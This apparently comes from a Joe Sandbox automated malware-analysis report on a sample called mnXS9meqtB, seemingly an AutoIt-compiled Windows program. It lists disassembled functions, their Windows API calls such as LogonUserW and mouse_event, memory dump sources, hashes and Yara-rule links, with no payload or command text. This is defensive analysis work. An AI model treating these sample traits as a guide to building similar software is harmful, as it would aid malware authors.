                                                                            • Opcode ID: 8ae1b221ddb2c7c40c2ef9e03d6265fb6a5decf617a9825ffd8b40a55fdfc405
                                                                            • Instruction ID: 2b803593dd66187d642da1b66153b67b621fd8b7f3aa4320855888666533baac
                                                                            • Opcode Fuzzy Hash: 8ae1b221ddb2c7c40c2ef9e03d6265fb6a5decf617a9825ffd8b40a55fdfc405
                                                                            • Instruction Fuzzy Hash: 6DE0D8352002046FD701EF9DD405D96B7ECAF78351F04C416F905D72A0DAB0F8048B90
                                                                            Function 003474BB Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • mouse_event.USER32(00000002,00000000,00000000,00000000,00000000), ref: 003474DE
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2339124121.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                                                            • Associated: 00000000.00000002.2339103740.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.000000000038D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.00000000003AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339608412.00000000003BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339678827.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_300000_mnXS9meqtB.jbxd
                                                                            Similarity
                                                                            • API ID: mouse_event
                                                                            • String ID:
                                                                            • API String ID: 2434400541-0
                                                                            • Opcode ID: ec8deb98d35c59ecd82a41155564317087b4d68ccb9811045a94186e797ab8ca
                                                                            • Instruction ID: d828603878cbd42dbf65005045a21d5e9e08b879b4b6757f3e94d01e05b15a1b
                                                                            • Opcode Fuzzy Hash: ec8deb98d35c59ecd82a41155564317087b4d68ccb9811045a94186e797ab8ca
                                                                            • Instruction Fuzzy Hash: 50D05EA012C30538EC6B07269C0FF760A8CF3007C0F838189B082CEAC1BB8078059132
                                                                            Function 0033B106 Relevance: 1.5, APIs: 1, Instructions: 18COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • LogonUserW.ADVAPI32(?,00000001,?,?,00000000,0033AD3E), ref: 0033B124
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2339124121.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                                                            • Associated: 00000000.00000002.2339103740.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.000000000038D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.00000000003AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339608412.00000000003BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339678827.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_300000_mnXS9meqtB.jbxd
                                                                            Similarity
                                                                            • API ID: LogonUser
                                                                            • String ID:
                                                                            • API String ID: 1244722697-0
                                                                            • Opcode ID: 9b53f87834f7e61d0672d17dacf539117005397d8bdef751dd3b4b1d6796c9a5
                                                                            • Instruction ID: 51544a3094645a1034f572b961f8ec30bb7c967d790b77782fbe279d03b03c9a
                                                                            • Opcode Fuzzy Hash: 9b53f87834f7e61d0672d17dacf539117005397d8bdef751dd3b4b1d6796c9a5
                                                                            • Instruction Fuzzy Hash: 36D09E321A464EAEDF025FA4EC06EAE3F6AEB04701F548511FA15D50A1C675D531AB50
                                                                            Function 0037B340 Relevance: 1.5, APIs: 1, Instructions: 7COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2339124121.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                                                            • Associated: 00000000.00000002.2339103740.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.000000000038D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.00000000003AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339608412.00000000003BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339678827.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_300000_mnXS9meqtB.jbxd
                                                                            Similarity
                                                                            • API ID: NameUser
                                                                            • String ID:
                                                                            • API String ID: 2645101109-0
                                                                            • Opcode ID: 07fba471cee475cbe6864063e331c13c869c34bc0ec17d114985a714fca0cca9
                                                                            • Instruction ID: d3509c6633db776f2c7d1c991d8ad6220d1cb51cdf49ac6cede2703dd0e224e6
                                                                            • Opcode Fuzzy Hash: 07fba471cee475cbe6864063e331c13c869c34bc0ec17d114985a714fca0cca9
                                                                            • Instruction Fuzzy Hash: F5C04CF140050ADFCB52DBC0C9449EEB7BCAB04701F1040919105F1150D7749B459B77
                                                                            Function 00328189 Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • SetUnhandledExceptionFilter.KERNEL32(?), ref: 0032818F
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2339124121.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                                                            • Associated: 00000000.00000002.2339103740.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.000000000038D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.00000000003AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339608412.00000000003BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339678827.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_300000_mnXS9meqtB.jbxd
                                                                            Similarity
                                                                            • API ID: ExceptionFilterUnhandled
                                                                            • String ID:
                                                                            • API String ID: 3192549508-0
                                                                            • Opcode ID: ad3d544e55a766d7064140cca40dc535b96c90fe30f0eff33be61b7bb8db2469
                                                                            • Instruction ID: 61012a81883af81127c82fed56396f77ad44795018806f5731d1bf8d46e9a059
                                                                            • Opcode Fuzzy Hash: ad3d544e55a766d7064140cca40dc535b96c90fe30f0eff33be61b7bb8db2469
                                                                            • Instruction Fuzzy Hash: 32A0113000020CAB8F022B82EC088883F2CEA002A0B0000A0F80C000208BA2A8208A82
                                                                            Function 0030E3B0 Relevance: .5, Instructions: 540COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2339124121.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                                                            • Associated: 00000000.00000002.2339103740.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.000000000038D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.00000000003AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339608412.00000000003BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339678827.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_300000_mnXS9meqtB.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 37bfe1eb71125ae964f68e96cb112763199c9bcc308ab526b23f83c22e98e615
                                                                            • Instruction ID: 543af42536f41aed332135026b271ee7986fb4b6c0f817f7b940085e8e86f20f
                                                                            • Opcode Fuzzy Hash: 37bfe1eb71125ae964f68e96cb112763199c9bcc308ab526b23f83c22e98e615
                                                                            • Instruction Fuzzy Hash: 9522C170A05209CFDB26DF54C4A0ABAB7F1FF18304F15C869D949AB391E735AD81CB91
                                                                            Function 003093F0 Relevance: .5, Instructions: 531COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2339124121.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                                                            • Associated: 00000000.00000002.2339103740.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.000000000038D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.00000000003AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339608412.00000000003BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339678827.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_300000_mnXS9meqtB.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 269e4e3adfd050a029832bc599fc0c8d0223d041057959aa168d78806958e2c8
                                                                            • Instruction ID: d3f987c3c9f91a86281913b96a5dfb7bb603c8052766ca72258a5593af520411
                                                                            • Opcode Fuzzy Hash: 269e4e3adfd050a029832bc599fc0c8d0223d041057959aa168d78806958e2c8
                                                                            • Instruction Fuzzy Hash: C412A070A01609DFDF16DFA5D991AEEB7F9FF48300F108529E806E7295EB36A910CB50
                                                                            Function 0030AF50 Relevance: .5, Instructions: 514COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2339124121.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                                                            • Associated: 00000000.00000002.2339103740.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.000000000038D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.00000000003AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339608412.00000000003BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339678827.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_300000_mnXS9meqtB.jbxd
                                                                            Similarity
                                                                            • API ID: Exception@8Throwstd::exception::exception
                                                                            • String ID:
                                                                            • API String ID: 3728558374-0
                                                                            • Opcode ID: 22d9b7ace5b5d76a7d88dc3294f23bb8914eba0bba7ebd31d4bb9b766cfbe743
                                                                            • Instruction ID: 0db6aa7b7c562298ac1f4b6e619580afca58b2a416cae43f3983eb77f58aa008
                                                                            • Opcode Fuzzy Hash: 22d9b7ace5b5d76a7d88dc3294f23bb8914eba0bba7ebd31d4bb9b766cfbe743
                                                                            • Instruction Fuzzy Hash: AA02B270A01205DFCF1ADF64D991AAFB7B9EF48300F11C469E80ADB295EB35D950CB91
                                                                            Function 003202A4 Relevance: .3, Instructions: 345COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2339124121.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                                                            • Associated: 00000000.00000002.2339103740.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.000000000038D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.00000000003AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339608412.00000000003BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339678827.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_300000_mnXS9meqtB.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 6bcf19402166b509fafb4c50a64371ef2a93877f8d810bfc08732e8a9195a1a8
                                                                            • Instruction ID: e63bf4afac37178a079305a7be8ec5590aeea26e7552cfc83653e288c7e6f6cd
                                                                            • Opcode Fuzzy Hash: 6bcf19402166b509fafb4c50a64371ef2a93877f8d810bfc08732e8a9195a1a8
                                                                            • Instruction Fuzzy Hash: 4AC1A5362051A30EDF2F463A947447EFAA15AA27B171B076DD4B3CB4D6FF20C568D620
                                                                            Function 003206D9 Relevance: .3, Instructions: 341COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2339124121.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                                                            • Associated: 00000000.00000002.2339103740.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.000000000038D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.00000000003AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339608412.00000000003BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339678827.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_300000_mnXS9meqtB.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 2d76c3bdd49f8e00aad6e71f29a941d673537f809e9b181fbd8d4251c6dfdf40
                                                                            • Instruction ID: a1ee8855d14357a6fd56bda423537445a14ada4ada0722e4b7790e4c3468147f
                                                                            • Opcode Fuzzy Hash: 2d76c3bdd49f8e00aad6e71f29a941d673537f809e9b181fbd8d4251c6dfdf40
                                                                            • Instruction Fuzzy Hash: D0C1B0322051A30EDF2E463ED47447EBAA15AA2BB171B076DD4B3CB4D6FF20D568D620
                                                                            Function 0031FA57 Relevance: .3, Instructions: 323COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2339124121.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                                                            • Associated: 00000000.00000002.2339103740.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.000000000038D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.00000000003AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339608412.00000000003BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339678827.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_300000_mnXS9meqtB.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
                                                                            • Instruction ID: b7a30175a7ae51a85e02bc1a848f981323bf261251fe5b8ce67b807b36109d09
                                                                            • Opcode Fuzzy Hash: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
                                                                            • Instruction Fuzzy Hash: 61C18F322090930DDF2E463AC4744BEBAA15AA6BB571B077DD8B3CB5D5FF20C5A4D620
                                                                            Function 00D47EB0 Relevance: .1, Instructions: 92COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2346669744.0000000000D44000.00000040.00000020.00020000.00000000.sdmp, Offset: 00D44000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_d44000_mnXS9meqtB.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 424b499c86482d5e2cad33d2eb2b77d7085f14ac4781241b47b3debc7e1ef18c
                                                                            • Instruction ID: 10c54f1b12bc4f8b6d4e9ced043e56cb9a70b60e72b81e1e2d0b2bb991cfbd40
                                                                            • Opcode Fuzzy Hash: 424b499c86482d5e2cad33d2eb2b77d7085f14ac4781241b47b3debc7e1ef18c
                                                                            • Instruction Fuzzy Hash: 0F41A271D1051CEBCF48CFADC991AAEBBF2AF88201F548299D516AB345D730AB41DB90
                                                                            Function 00D47D40 Relevance: .0, Instructions: 35COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2346669744.0000000000D44000.00000040.00000020.00020000.00000000.sdmp, Offset: 00D44000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_d44000_mnXS9meqtB.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 6091d3ab8c142cd01bdaf95ad615aaddba634de501579065cef803e1d5150a63
                                                                            • Instruction ID: 891faacdb0703049b2717927a732f86c8d199644a0f623203e626f1f4e6e9269
                                                                            • Opcode Fuzzy Hash: 6091d3ab8c142cd01bdaf95ad615aaddba634de501579065cef803e1d5150a63
                                                                            • Instruction Fuzzy Hash: 32019278E15109EFCB48DF98C5909AEF7B5FF48310F248599E819A7301E730AE41DB90
                                                                            Function 00D47DA0 Relevance: .0, Instructions: 35COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2346669744.0000000000D44000.00000040.00000020.00020000.00000000.sdmp, Offset: 00D44000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_d44000_mnXS9meqtB.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 2824983519b781728331ca74e43d8f1b114060d413125894b627f2317d3cf6f3
                                                                            • Instruction ID: aa0c840f5803840529722121b8eec9c85c6ae91f356f8f58c891f8850e194f7c
                                                                            • Opcode Fuzzy Hash: 2824983519b781728331ca74e43d8f1b114060d413125894b627f2317d3cf6f3
                                                                            • Instruction Fuzzy Hash: 1E019278E14109EFCB44DF98C5909AEF7B5FF48310F208599E819A7301E730AE41DB90
                                                                            Function 00D46710 Relevance: .0, Instructions: 6COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2346669744.0000000000D44000.00000040.00000020.00020000.00000000.sdmp, Offset: 00D44000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_d44000_mnXS9meqtB.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: e1f80ac41b4fc2d45690e214ca5193b9bf4f67450f61a2a701b7f1fb86cd8f4e
                                                                            • Instruction ID: 2052e7d0eb43af8a57a5c2d707c06396f1b84aee57587abda472ed480d51124b
                                                                            • Opcode Fuzzy Hash: e1f80ac41b4fc2d45690e214ca5193b9bf4f67450f61a2a701b7f1fb86cd8f4e
                                                                            • Instruction Fuzzy Hash: 1AB012310527488BC2118B89E008B1073ECA308E04F1000B0D40C07B01827874008D48
                                                                            Function 0035A2A9 Relevance: 77.5, APIs: 40, Strings: 4, Instructions: 490filecommemoryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • DeleteObject.GDI32(00000000), ref: 0035A2FE
                                                                            • DeleteObject.GDI32(00000000), ref: 0035A310
                                                                            • DestroyWindow.USER32 ref: 0035A31E
                                                                            • GetDesktopWindow.USER32 ref: 0035A338
                                                                            • GetWindowRect.USER32(00000000), ref: 0035A33F
                                                                            • SetRect.USER32(?,00000000,00000000,000001F4,00000190), ref: 0035A480
                                                                            • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000002), ref: 0035A490
                                                                            • CreateWindowExW.USER32(00000002,AutoIt v3,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0035A4D8
                                                                            • GetClientRect.USER32(00000000,?), ref: 0035A4E4
                                                                            • CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,00000000,00000000,00000000), ref: 0035A51E
                                                                            • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0035A540
                                                                            • GetFileSize.KERNEL32(00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0035A553
                                                                            • GlobalAlloc.KERNEL32(00000002,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0035A55E
                                                                            • GlobalLock.KERNEL32(00000000), ref: 0035A567
                                                                            • ReadFile.KERNEL32(00000000,00000000,00000000,00000190,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0035A576
                                                                            • GlobalUnlock.KERNEL32(00000000), ref: 0035A57F
                                                                            • CloseHandle.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0035A586
                                                                            • GlobalFree.KERNEL32(00000000), ref: 0035A591
                                                                            • CreateStreamOnHGlobal.OLE32(00000000,00000001,88C00000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0035A5A3
                                                                            • OleLoadPicture.OLEAUT32(88C00000,00000000,00000000,0038D9BC,00000000), ref: 0035A5B9
                                                                            • GlobalFree.KERNEL32(00000000), ref: 0035A5C9
                                                                            • CopyImage.USER32(000001F4,00000000,00000000,00000000,00002000), ref: 0035A5EF
                                                                            • SendMessageW.USER32(?,00000172,00000000,000001F4), ref: 0035A60E
                                                                            • SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000020,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0035A630
                                                                            • ShowWindow.USER32(00000004,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0035A81D
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2339124121.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                                                            • Associated: 00000000.00000002.2339103740.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.000000000038D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.00000000003AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339608412.00000000003BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339678827.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_300000_mnXS9meqtB.jbxd
                                                                            Similarity
                                                                            • API ID: Window$Global$CreateRect$File$DeleteFreeObject$AdjustAllocClientCloseCopyDesktopDestroyHandleImageLoadLockMessagePictureReadSendShowSizeStreamUnlock
                                                                            • String ID: $AutoIt v3$DISPLAY$static
                                                                            • API String ID: 2211948467-2373415609
                                                                            • Opcode ID: 0b3ca38905802e787fa9445dc1b76a114424375de8f449f48e263ed91a8030e6
                                                                            • Instruction ID: cd0bf24c3987efa0d82d0f29d34dafbca5af21b786bc834fb791ad8d542b597f
                                                                            • Opcode Fuzzy Hash: 0b3ca38905802e787fa9445dc1b76a114424375de8f449f48e263ed91a8030e6
                                                                            • Instruction Fuzzy Hash: B7028A75900218AFDB16DFA4DC89EAE7BB9FF49311F008258F905AB2A1D730ED41DB60
                                                                            Function 0036D285 Relevance: 49.8, APIs: 33, Instructions: 260COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • SetTextColor.GDI32(?,00000000), ref: 0036D2DB
                                                                            • GetSysColorBrush.USER32(0000000F), ref: 0036D30C
                                                                            • GetSysColor.USER32(0000000F), ref: 0036D318
                                                                            • SetBkColor.GDI32(?,000000FF), ref: 0036D332
                                                                            • SelectObject.GDI32(?,00000000), ref: 0036D341
                                                                            • InflateRect.USER32(?,000000FF,000000FF), ref: 0036D36C
                                                                            • GetSysColor.USER32(00000010), ref: 0036D374
                                                                            • CreateSolidBrush.GDI32(00000000), ref: 0036D37B
                                                                            • FrameRect.USER32(?,?,00000000), ref: 0036D38A
                                                                            • DeleteObject.GDI32(00000000), ref: 0036D391
                                                                            • InflateRect.USER32(?,000000FE,000000FE), ref: 0036D3DC
                                                                            • FillRect.USER32(?,?,00000000), ref: 0036D40E
                                                                            • GetWindowLongW.USER32(?,000000F0), ref: 0036D439
                                                                              • Part of subcall function 0036D575: GetSysColor.USER32(00000012), ref: 0036D5AE
                                                                              • Part of subcall function 0036D575: SetTextColor.GDI32(?,?), ref: 0036D5B2
                                                                              • Part of subcall function 0036D575: GetSysColorBrush.USER32(0000000F), ref: 0036D5C8
                                                                              • Part of subcall function 0036D575: GetSysColor.USER32(0000000F), ref: 0036D5D3
                                                                              • Part of subcall function 0036D575: GetSysColor.USER32(00000011), ref: 0036D5F0
                                                                              • Part of subcall function 0036D575: CreatePen.GDI32(00000000,00000001,00743C00), ref: 0036D5FE
                                                                              • Part of subcall function 0036D575: SelectObject.GDI32(?,00000000), ref: 0036D60F
                                                                              • Part of subcall function 0036D575: SetBkColor.GDI32(?,00000000), ref: 0036D618
                                                                              • Part of subcall function 0036D575: SelectObject.GDI32(?,?), ref: 0036D625
                                                                              • Part of subcall function 0036D575: InflateRect.USER32(?,000000FF,000000FF), ref: 0036D644
                                                                              • Part of subcall function 0036D575: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 0036D65B
                                                                              • Part of subcall function 0036D575: GetWindowLongW.USER32(00000000,000000F0), ref: 0036D670
                                                                              • Part of subcall function 0036D575: SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 0036D698
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2339124121.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                                                            • Associated: 00000000.00000002.2339103740.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.000000000038D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.00000000003AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339608412.00000000003BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339678827.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_300000_mnXS9meqtB.jbxd
                                                                            Similarity
                                                                            • API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameMessageRoundSendSolid
                                                                            • String ID:
                                                                            • API String ID: 3521893082-0
                                                                            • Opcode ID: 432619662ac07ad13d18341d34196f3b11fde44eae68664e4a4519ebdb5d3de5
                                                                            • Instruction ID: 9f57adb180aba09191ad4ba2d28d5ac6e92059c9cab975144d90b61e37be8954
                                                                            • Opcode Fuzzy Hash: 432619662ac07ad13d18341d34196f3b11fde44eae68664e4a4519ebdb5d3de5
                                                                            • Instruction Fuzzy Hash: D791A072508301BFCB129F64DC48E6BBBADFF89325F104A19F962961E0DB71D944CB52
                                                                            Function 0031B8FD Relevance: 49.5, APIs: 27, Strings: 1, Instructions: 491windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • DestroyWindow.USER32 ref: 0031B98B
                                                                            • DeleteObject.GDI32(00000000), ref: 0031B9CD
                                                                            • DeleteObject.GDI32(00000000), ref: 0031B9D8
                                                                            • DestroyIcon.USER32(00000000), ref: 0031B9E3
                                                                            • DestroyWindow.USER32(00000000), ref: 0031B9EE
                                                                            • SendMessageW.USER32(?,00001308,?,00000000), ref: 0037D2AA
                                                                            • ImageList_Remove.COMCTL32(?,000000FF,?), ref: 0037D2E3
                                                                            • MoveWindow.USER32(00000000,?,?,?,?,00000000), ref: 0037D711
                                                                              • Part of subcall function 0031B9FF: InvalidateRect.USER32(?,00000000,00000001,?,?,?,0031B759,?,00000000,?,?,?,?,0031B72B,00000000,?), ref: 0031BA58
                                                                            • SendMessageW.USER32 ref: 0037D758
                                                                            • SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 0037D76F
                                                                            • ImageList_Destroy.COMCTL32(00000000), ref: 0037D785
                                                                            • ImageList_Destroy.COMCTL32(00000000), ref: 0037D790
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2339124121.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                                                            • Associated: 00000000.00000002.2339103740.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.000000000038D000.00000002.00000001.01000000.00000003.sdmpDownload File
